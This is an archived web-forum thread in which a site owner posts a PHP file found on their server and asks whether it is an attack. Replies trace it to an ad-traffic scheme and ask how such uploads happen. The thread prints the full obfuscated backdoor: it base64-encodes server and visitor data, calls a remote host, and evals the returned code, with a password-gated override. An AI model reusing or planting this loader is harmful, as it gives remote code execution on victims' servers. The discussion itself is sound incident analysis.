Jump to content

Is this a Hacking attempt?


Beedge

Recommended Posts

I found a file with the following code on my server in a folder with MOD 777

I suspect it is a hacking attempt.. can anyone tell me whats going on?

Thanks~!

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ade11da1971ab70623dbc41f2836aa7c") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{
$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);
};
die(); 
?>

Link to comment
https://forums.phpfreaks.com/topic/148084-is-this-a-hacking-attempt/
Share on other sites

Oh my. I just love the content of this page.

 

What is this site?

This site helps webmasters to earn money with their sites.

How it works?

Our program generate traffic from search engines and display advertising.

What shell I do to start with you ?

Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money !

 

it's that easy! XD

Hi

 

Bit more of a look and it appears that the page it goes to is http://ads3.phpsearch.cn (as mentioned by rhodesa). However if you go directly there it does a redirect elsewhere (puts /en/ on the end), unless you put a random query string on the end when it does nothing.

 

All the best

 

Keith

I think the worrying thing is how did it get on my server in the first place...?

 

and how can I prevent similar scripts saving themselves on it..

 

I have to make the folder writable because the app on the server allows users to upload files to this folder

 

any suggestions?

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.